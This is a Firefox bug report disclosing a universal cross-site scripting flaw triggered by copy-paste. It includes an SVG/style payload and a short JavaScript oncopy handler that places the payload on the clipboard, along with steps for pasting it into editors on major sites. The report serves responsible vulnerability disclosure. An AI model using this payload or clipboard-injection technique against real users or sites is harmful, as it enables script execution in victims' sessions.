Universal XSSin Firefox via Copy-Paste
Categories
(Firefox :: Untriaged, defect)
Tracking
()
People
(Reporter: sriyanto4th, Unassigned)
Details
Attachments
(3 files)
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
Steps to reproduce:
I found another XSS via copy-paste or maybe a bypass for bug https://bugzilla.mozilla.org/show_bug.cgi?id=1602843
Final payload: <svg><style><svg onload="javascript:alert(document.domain)">
I create live POC here https://sites.google.com/ultrasonic.page/test, the code:
document.oncopy = event => {
event.preventDefault();
event.clipboardData.setData('text/html', '<svg><style><svg onload="javascript:alert(document.domain)">');
}
Copying content from there, and paste it on editor with <div contenteditable> will execute the XSS.
I can show that the XSS will be executed on some major website like Google, Facebook, Microsoft, some email providers and many more.
Step to reproduce:
- Open Firefox or Firefox Nightly
- Goto https://sites.google.com/ultrasonic.page/test
- Copy the content
- Goto https://facebook.com/
- Press CTRL+V
- Goto Blogger editor --> Paste on Editor
- Goto some Office online apps --> Paste or press CTRL+V on editor
Please check attached video POC for more details.
Reproduced on:
- Latest Firefox and Firefox Nightly
- Windows 10
Actual results:
XSS will be executed on pasting or pressing CTRL+V
|
Reporter | |
Comment 1•4 years ago
|
||
|
|
Reporter | |
Comment 2•4 years ago
|
||
|
||
Updated•4 years ago
|
|
|
Reporter | |
Comment 4•4 years ago
|
||
|
||
Updated•11 months ago
|
Description
•